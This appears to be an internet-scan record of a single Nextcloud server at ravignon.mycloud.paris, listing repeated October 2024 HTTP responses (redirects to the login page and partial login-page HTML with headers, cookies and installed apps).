Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-20 09:01
HTTP/1.1 302 Found Date: Sun, 20 Oct 2024 09:01:55 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-dm1mbTFxa0VoMFAzcDFBamZVUmJzRFdacnYyWENZMGJ3L0trbERibUVodz06NkEySmc4ZFg3WEtkL2hwT0VnRVNnVjM5MmJQU1g3cDhncHp6dzFUZUlDdz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=sAZisn0hendw%2F%2FihDscS%2BP1oJKEUPUhgf3hROibOpeSeXS6yU7fx65RdI0qEL1nQ9pmdoQTGLRCOm3DuGRsbwFDv%2BDiuP0so9lG0tQfRQzqzhO6n5IGp31DGKoftw3rb; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=l4d9f84q2rsnngdlfeui6d5cqf; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-19 21:48
HTTP/1.1 400 Bad Request Date: Sat, 19 Oct 2024 21:47:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=htnleiC7eou28y%2F4NrRWo6aVFGy%2Fgi9P1xyR8mFxIG9aVa5P36nU3%2FiHdI2%2F1Jp0pAZrrbfVAuTmteKRKEyGFFTvc9JExFfM%2FtxKSl1Sd8Ios0BqtEK79Dez%2BTBbwh3l; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=2beb8prqtbc3d5r5mfm1tq8j9m; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="2xBbpO8NfKnj3pnJPLGbyc8aanxykc+A11X0p9IFANM=:sUA43KQ9D/DMv/7xbOfdmP5yJgtd34fhkQaEwIdQOOs="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="MnhCYnBPOE5mS25qM3BuSlBMR2J5YzhhYW54eWtjK0ExMVgwcDlJRkFOTT06c1VBNDNLUTlEL0RNdi83eGJPZmRtUDV5Smd0ZDM0ZmhrUWFFd0lkUU9Pcz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-18 08:40
HTTP/1.1 302 Found Date: Fri, 18 Oct 2024 08:40:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-LzY2M1NpcFJFMmQzenpEOEQ1WFYyQkZ6K1l1Mis4U25JdGxsSnBvcG1Jcz06aytqakIzOFFRQk1nZzJMSlhQNjhyejVDck1UVWp2TDBXNVl6U3ZaUjFORT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=XXfrOqDHbBmGd61DlVdAufM6Hetrn00O8Yq8dVgIqcSU6C3QooenXflLa4G9vzpl%2BWr4j7jm7hUavNKya1wxN8Lq1OZ2oPXZW45mb4GzPOx5IMjn%2BmoMr3Og4guvfX%2F2; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=cket2fsgdt9im39rq058alrdpr; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-17 21:29
HTTP/1.1 400 Bad Request Date: Thu, 17 Oct 2024 21:29:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=EbIo5ip%2FfWWHrE28vCHdZOuoeSLNfIhrXL3xpfAU9r8AK7U%2B3YVakoN9EGG7rsedDnqGbWHHVKKrZdA7n41xVSaSljFLDscMHcNGjOpG1iZ5iWmEc1m3vkV2zBPvo1th; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=pejs2jgcgfku8musfkuao1e9l3; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="N7KYkhZqDWLXDeiZoixjoop9HSpYUF806whEJmluRb4=:Zv3I8H8bRjjkatHDmhRUjborLWwQFg0EjnkRSVo6A8s="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="TjdLWWtoWnFEV0xYRGVpWm9peGpvb3A5SFNwWVVGODA2d2hFSm1sdVJiND06WnYzSThIOGJSamprYXRIRG1oUlVqYm9yTFd3UUZnMEVqbmtSU1ZvNkE4cz0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-16 13:13
HTTP/1.1 302 Found Date: Wed, 16 Oct 2024 13:13:06 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-R1dINjY3RS9MUk1PUzNxK3JMOXVxM21qQituR1MyUGovZHdZYTFJdkhLUT06SUZuTzJ2VitUbjVBQWc3UzNjWS8rd25SWnFHbkp4Tzd5b1o5RGdSRGVmUT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=XN2bHrsEj9RHi9AoJ5ispmmrGk8V3xQfUMSVlwwXlfo2Ys7fRUc1N36gqtfhbFExX85OgWGptkfUOL9dmT9%2BM8NF%2Fpe5NVomCMJ8lKTU%2BFUBdmtpsz7Q5h5qvpKCgNsJ; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=4nqhrnt1qfiufceghr8kr40gme; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-15 22:48
HTTP/1.1 400 Bad Request Date: Tue, 15 Oct 2024 22:48:41 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=B%2FL%2BtGdRdMbSyxBRn0dOUcEMUv8Ddoto4j6LzlJ6RgUzDv5T56dDUAe1jRz628%2FdP1axz05m8pGlDQDNclo%2FmT9O7dn0fJAG8H%2FjIBL%2FzzWfzMCq%2F6fS3CB75dJrQOJd; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=mffb8c60tvtkjri5pusgak6rhs; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="GGDe1L1vmmRuT2r+4MriV/vB2expMXIeSzNusb/KSM4=:cAGSrcg9zQ89ZCyblJCvEKKo6YYsQUdTCXsJ4vX/Mr4="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/dist/core-common.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/dist/core-main.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/dist/core-files_fileinfo.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/dist/core-files_client.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0=" defer src="/core/js/backgroundjobs.js?v=ccbf35ac-1"></script> <script nonce="R0dEZTFMMXZtbVJ1VDJyKzRNcmlWL3ZCMmV4cE1YSWVTek51c2IvS1NNND06Y0FHU3JjZzl6UTg5WkN5YmxKQ3ZFS0tvNllZc1FVZFRDWHNKNHZYL01yND0="> var _oc_debug=false; var _oc_isadmin=false; var backendAllowsPasswordConfirmation=true; var oc_dataURL=false; var _oc_webroot=""; var _oc_appswebroots={"activity":"/apps/activity","calendar":"/apps/calendar","circles":"/apps/circles","cloud_federation_api":"/apps/cloud_federation_api","comments":"/apps/comments","contacts":"/apps/contacts","contactsinteraction":"/apps/contactsinteraction","dashboard":"/apps/dashboard","dav":"/apps/dav","federatedfilesharing":"/apps/federatedfilesharing","federation":"/apps/federation","files":"/apps/files","files_pdfviewer":"/apps/files_pdfviewer","files_rightclick":"/apps/files_rightclick","files_sharing":"/apps/files_sharing","files_trashbin":"/apps/files_trashbin","files_versions":"/apps/files_versions","firstrunwizard":"/apps/firstrunwizard","logreader":"/apps/logreader","lookup_server_connector":"/apps/lookup_server_connector","mail":"/apps/mail","nextcloud_announcements":"/apps/nextcloud_announcements","notifications":"/apps/notifications","oauth2":"/apps/oauth2","password_policy":"/apps/password_policy","photos":"/apps/photos","privacy":"/apps/privacy","provisioning_api":"/apps/provisioning_api","recommendations":"/apps/recommendations","related_resources":"/apps/related_resources","richdocuments":"/apps/richdocuments","serverinfo":"/apps/serverinfo","settings":"/apps/settings","sharebymail":"/apps/sharebymail","spreed":"/apps/spreed","support":"/apps/support","survey_client":"/apps/survey_client","systemtags":"/apps/systemtags","text":"/apps/text","theming":"/apps/theming","twofactor_backupcodes":"/apps/twofactor_backupcodes","updatenotification":"/apps/updatenotification","user_status":"/apps/user_status","viewer":"/apps/viewer","weather_status":"/apps/weather_status","workflowengine":"/apps/workflowengine"}; var datepickerFormatDate="M\/d\/y
Open service 109.190.179.92:443 · ravignon.mycloud.paris
2024-10-02 16:27
HTTP/1.1 302 Found Date: Wed, 02 Oct 2024 16:27:56 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-b05YeFdTYzNHN011cXUweDBCQTN2QWY0N0xaak1uNVpYbkZnY0JESHR2Zz06MXJhVEVsSmZYK2xYenI1SG8wQU9pRytBM2RnaVVRUUtOelZXUGtPdjI1WT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=V1OHpYgBbMgJNrKmnFU5yxFRyWhAjOXeT0LnF1u9Q1HxNPCPXBdqh5ITNQ5pzo05P1fVeuc7n3se91DbLhN6YN7u%2B6r2%2FD%2F8cLgLVYDfabiEh4SbVmnBEsAJyyQ27zK%2F; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=fhful59e84nrre7142n21ukcoe; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Location: https://ravignon.mycloud.paris/index.php/login Content-Length: 0 Content-Type: text/html; charset=UTF-8
Open service 109.190.179.92:443
2024-10-01 22:21
HTTP/1.1 400 Bad Request Date: Tue, 01 Oct 2024 22:21:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *; object-src 'none'; base-uri 'self'; Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=d9YM2UtF6j5g12SvusvXPoXj%2FaNXgeQsQy5jefzB7bmzidV0AaTIDH15tKYFGRt1nQd4%2FGVqNwYBY1RzP2Lv%2BJc8NvnwaHeRP0XfHSGaxkJil5JsnwlNTel%2BtOGcgjGh; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict Set-Cookie: ocfyh1p0sac1=acse8jt4hphej03neeurhmndvm; path=/; secure; HttpOnly; SameSite=Lax Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: none X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Page title: Nextcloud <!DOCTYPE html> <html class="ng-csp" data-placeholder-focus="false" lang="en" data-locale="en" > <head data-requesttoken="hMt1BDLDIXLv2sf3xh2fHLi626wyC4Gx6GS7+mQliYg=:1P1eYGuGVjaa7ImBkkWsROKIn5xEZezCqyjojxZu6rA="> <meta charset="utf-8"> <title> Nextcloud </title> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"> <meta name="apple-itunes-app" content="app-id=1125420102"> <meta name="theme-color" content="#0082c9"> <link rel="icon" href="/core/img/favicon.ico"> <link rel="apple-touch-icon" href="/core/img/favicon-touch.png"> <link rel="mask-icon" sizes="any" href="/core/img/favicon-mask.svg" color="#0082c9"> <link rel="manifest" href="/core/img/manifest.json"> <link rel="stylesheet" href="/core/css/server.css?v=ccbf35ac-1"> <link rel="stylesheet" href="/apps/theming/css/default.css?v=d233662f-1"> <link rel="stylesheet" href="/core/css/guest.css?v=ccbf35ac-1"> <script nonce="aE10MUJETERJWEx2MnNmM3hoMmZITGk2MjZ3eUM0R3g2R1M3K21RbGlZZz06MVAxZVlHdUdWamFhN0ltQmtrV3NST0tJbjV4RVplekNxeWpvanhadTZyQT0=" defer 